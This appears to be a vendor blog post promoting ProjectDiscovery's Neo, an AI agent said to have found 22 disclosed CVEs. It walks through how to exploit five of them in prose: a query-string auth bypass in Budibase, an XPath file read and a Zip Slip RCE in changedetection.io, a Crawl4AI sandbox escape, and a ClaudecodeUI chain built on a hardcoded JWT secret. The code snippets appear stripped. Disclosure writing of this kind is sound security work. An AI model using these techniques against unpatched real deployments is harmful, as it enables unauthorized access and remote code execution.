The practical reality for a security team deploying AI is messier than the headlines or early POC results suggest. Noise compounds fast. Anthropic brought in external security researchers to help validate the volume of results. OpenAI heard from maintainers that the challenge isn't too few vulnerability reports, but too many low-quality ones. For anyone trying to operationalize LLMs, this should sound familiar: LLMs produce great findings, but without a verification loop, more scanning just creates more triage, not more security.
ProjectDiscovery has spent five years building open source security tooling and working alongside the researchers who use it. We built Neo to close the gap between finding vulnerabilities and proving them. In our recent benchmark against Claude Code and traditional SAST/DAST tools on AI-generated applications, Neo found 60% more vulnerabilities with 80% fewer false positives, because it doesn't just reason about code, it deploys applications, tests them at runtime, and produces pentest-grade evidence.
So we put Neo to the test. Could it reason through popular, actively maintained repositories, find complex vulnerabilities, and deliver high-signal results without hours of manual triage?
We pointed Neo at trending open source projects, many with tens of thousands of GitHub stars, without telling it what to look for.
Neo cloned each repo, reasoned through the codebase, and validated findings end-to-end by deploying applications and building working exploits. Sessions ranged from about 30 minutes to nearly 4 hours depending on codebase size. Our team's only job was submitting the confirmed results to the affected projects.
Neo produced 22 confirmed CVEs across 13 projects with a false positive rate around 10-20%, with more findings still in the disclosure process. Neo surfaced complex vulnerabilities like sandbox escapes and multi-step exploit chains, each with working proof-of-concept exploits and pentester-grade evidence like OAST callbacks and confirmed file reads.
Here's the full list, followed by deep dives on five findings that show what this kind of reasoning looks like in practice.
All vulnerabilities have been reported to affected projects. Most have been patched in the versions listed in the advisories linked from each CVE.
Budibase is a low-code platform for building internal tools. The auth bypass Neo found gives any unauthenticated user full access to every API endpoint in the application, including user management, data operations, and internal service queries.
The bug is in packages/server/src/middleware/authorized.ts. Budibase exempts webhook endpoints from authentication because webhooks need to be callable without user sessions. The check uses a regex:
In Koa (the HTTP framework Budibase uses), ctx.request.url is the full URL including query parameters. The regex test runs against the entire string, not just the path. Appending ?/webhooks/trigger to any endpoint causes the regex to match, and the middleware skips all JWT validation, role checks, and CSRF protection:
How Neo found it. Neo indexed the entire Budibase codebase first: 45+ controllers, 15 integrations, multiple middleware chains. It mapped every auth boundary (authorized.ts, authenticated.ts, builderOnly.ts, csrf.ts, and the publicRoutes group). When it read authorized.ts, it found isWebhookEndpoint() and checked specifically what ctx.request.url contains in Koa. It recognized that the regex would match against query parameters, tested the bypass, and confirmed 401 became 200.
Neo then mapped the full blast radius. It enumerated all users, escalated a regular user to admin via the PATCH /api/global/users endpoint, and chained the bypass with an SSRF in /api/queries/import/info to reach internal infrastructure. From the SSRF chain, it confirmed CouchDB was reachable at couchdb-service:5984 and mapped the internal Docker network: worker at 172.18.0.7, app at 172.18.0.8, proxy at 172.18.0.9.
Why this is hard to catch. The logic is correct in intent. Webhooks genuinely need to bypass auth, and the regex looks right when you read it. Catching the actual bug requires knowing a Koa implementation detail about what ctx.request.url includes, then testing a URL-parsing bypass condition that no standard auth testing covers.
changedetection.io is a self-hosted tool for monitoring websites for changes. Users can set XPath expressions as content filters. The expression is passed directly to elementpath.select() with XPath3Parser:
XPath 3.0, unlike earlier versions, includes functions for reading files and HTTP resources. unparsed-text() reads files from the filesystem. There's no function denylist between user input and the parser:
On any default changedetection.io instance (which ships with no authentication), creating a watch with this filter and triggering a check returns the file contents inline in the snapshot output.
How Neo found it. Neo traced the XPath processing pipeline from the watch configuration UI down to html_tools.py line 213. It identified the parser class as XPath3Parser and then checked what capabilities XPath 3.0 adds over XPath 1.0, finding that unparsed-text() provides filesystem and HTTP access. It tested the payload and got the file contents back in the snapshot output.
Neo's approach was capability mapping against the library's specification rather than code pattern matching. It asked "what can this parser do?" not just "does untrusted input reach it?"
Why this is hard to catch. The code is doing exactly what it's supposed to: parsing a user-supplied XPath expression. The risk isn't in the code pattern but in what the XPath 3.0 specification permits. File access through unparsed-text() is a spec-level capability that almost nobody outside of XML tooling specialists knows about, and there's no SAST rule for it.
Crawl4AI is a popular web crawling framework with an API server. Its /crawl endpoint accepts a hooks parameter with user-supplied Python code. The code runs inside an exec() with what looks like a sandboxed builtins allowlist:
The developer built a sandbox. A reviewer seeing an allowlist with only two entries might reasonably conclude the sandbox is restrictive. But __import__ is Python's module loading function. Once it's available inside exec(), you can import os, subprocess, socket, the entire standard library. The allowlist is defeated by its first entry.
How Neo found it. Neo found the exec() call in hook_manager.py and didn't just flag it generically. It read the allowed_builtins list and reasoned about what each entry actually permits at runtime, identifying __import__ specifically as negating the entire sandbox. It traced the full path from POST /crawl through the hooks parameter to the exec call, built an OAST payload, and got the callback confirming code execution with the container hostname and internal IP. In the same session, Neo found three more RCE vectors in the same codebase.
Why this is hard to catch. An allowlist is a security control, and its presence signals that someone thought about the problem. SAST tools flag exec() generically, but they don't evaluate whether the builtins dictionary actually constrains anything. The distinction between "sandbox exists" and "sandbox works" requires understanding what __import__ does at runtime.
ClaudecodeUI is a web-based interface for Claude Code that exposes your development environment remotely. Neo found three independent bugs that chain to unauthenticated remote code execution on any default deployment.
Bug 1: Hardcoded JWT secret. The server uses a fallback secret ('claude-ui-dev-secret-change-in-production') when the environment variable isn't set. The variable isn't in .env.example, so users following the README never see a prompt to change it.
Bug 2: Platform mode auth bypass. A separate code path bypasses all authentication entirely, assigning a generic platform-user identity to every request.
Bug 3: No per-message auth on WebSocket shell. verifyClient checks the JWT once during the WebSocket upgrade handshake but never re-validates on subsequent messages. The shell handler writes directly to the PTY process with no further checks.
How Neo found it. Neo found the JWT fallback in server/middleware/auth.js, cross-referenced against .env.example to confirm the variable wasn't documented, forged a token with the default secret, and confirmed it worked. It then traced what an authenticated WebSocket session can do, finding that the shell handler writes directly to a PTY with no re-validation after the initial connection. It also independently discovered the platform mode bypass and a command injection where user input gets concatenated into a shell command with no sanitization.
Why this is hard to catch. Each bug individually looks like a reasonable design decision. Catching the chain requires asking not just "is auth implemented?" but "is auth enforced at every operation boundary?"
Critical · ~30,700 GitHub stars
The /import endpoint in changedetection.io restores backup archives. It has no authentication and uses Python's zipfile.extractall() with no path validation:
ZIP members with paths containing ../ sequences write outside the intended directory. By crafting a ZIP with a member targeting an imported Python module (like changedetectionio/__init__.py), an attacker achieves RCE on the next request that triggers an import.
How Neo found it. Backup and restore endpoints are high-priority targets in Neo's analysis because they're typically written quickly, assumed to be admin-only, and rarely security-reviewed. Neo found the /import endpoint, confirmed it had no authentication, recognized the Zip Slip pattern, and generated a proof-of-concept ZIP that confirmed arbitrary file write outside the temporary directory.
We've been building AI automation on top of our security toolchain since 2024, and we spent a long time learning exactly where the model stops being useful. Models are excellent at forming hypotheses about what might be vulnerable, but acting on those hypotheses, deploying an application, injecting a payload, observing whether the server made an outbound request to a callback URL, requires purpose-built infrastructure that doesn't exist in a general-purpose agent.
Neo runs on the latest frontier models with 30+ agent-native tools on top of the ProjectDiscovery toolchain, inside isolated sandboxes with their own network stack, browser, and the same security toolchain that 100,000+ practitioners already trust. The result is an agent that operates like a researcher in their own lab: form a hypothesis, test it against a live application, capture evidence.
For security teams, this is what Neo is built for: the auth bypasses, sandbox escapes, and logic flaws that matter most but take the longest to find and prove. The 22 CVEs in this post arrived confirmed, with evidence, ready to act on. That's the difference between security automation that compounds and security automation that generates more work.
These 22 CVEs are just the start. We have a growing number of findings working through the disclosure process, and we're continuing to run Neo against open source targets and work with maintainers on fixes. At the rate that AI-adjacent software is being written and deployed, the gap between what's shipping and what's been audited is only going to widen. We hope Neo can help bridge it.
This research also showed us where to focus next. Some vulnerability classes exposed gaps where dedicated sub-agents with class-specific validation logic would produce better signal. Projects with complex dependency chains were harder to deploy autonomously, which limited what Neo could validate at runtime. Both are active areas of development.
Our mission is straightforward: surface real security risk that matters, without the noise that buries it. If you maintain a project and want Neo to look at your codebase, reach out: https://projectdiscovery.io/request-demo. And if you've been building security automation yourself and know firsthand how hard it is to get past the demo stage, come take a look at what we've built. We're just getting started.
Going to #RSAC? Curious what Neo can really do? Don’t just take our word for it, try it yourself. Start here: https://projectdiscovery.io/events/rsac-2026